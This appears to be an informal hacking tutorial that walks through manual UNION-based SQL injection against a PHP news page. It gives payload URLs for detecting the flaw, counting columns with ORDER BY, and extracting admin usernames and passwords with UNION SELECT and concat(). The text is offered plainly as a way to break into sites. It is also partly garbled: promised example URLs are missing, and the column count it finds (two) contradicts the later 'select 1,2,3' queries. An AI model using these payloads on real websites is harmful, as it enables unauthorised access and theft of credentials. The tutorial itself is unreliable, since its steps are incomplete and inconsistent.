Now we are going to learn how to hack the sites which is vulnerable to Sql injection.So lets begin


To check if the site is vulnerable to Sql injection first check the url if it is like this




To check the vulnerbility type appostrophy at the end of url so it will become like this




On hitting enter if you see this text on page


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc.


Then the website is vulnerable to this attack






To find number of columns we use statement ORDER BY (tells database how to order the result). In order to use, we do increment until we get an error.


http://www.site.com/news.php?id=7 order by 1 -- no error


http://www.site.com/news.php?id=7 order by 2 -- no error


http://www.site.com/news.php?id=7 order by 3 – error


so it means the site has 2 columns because we got error on 3th one.







Our next is step is to check for union function. This is because with union function we can select more data in one statement only.


http://www.site.com/news.php?id=7 union all select 1,2


Till 2 because we discoverd the no of column was 2 so lets move on


If we see some numbers on screen, i.e. 1 or 2  that means the UNION works







This is for MySQL version less than 5

http://www.site.com/news.php?id=7 union all select 1,2,3 from admin


We see number 2 on the screen like before. Now we know that table admin exists. Now to check column names we craft a query

http://www.site.com/news.php?id=7 union all select 1,2,username from admin


We get username displayed on screen

Now to check for the column password

http://www.site.com/news.php?id=7 union all select 1,2,password from admin


If we got successful, we will see password on the screen. It can be in plain text or hash depending on how the database has been setup ?. Now we must complete the query. For that we can use concat() function (it joins strings

http://www.site.com/news.php?id=7 union all select 1,2,concat(username,0x3a,password)from admin

Note that we put 0x3a, its hex value for so 0x3a is hex value for colon


Now we get displayed username: password on screen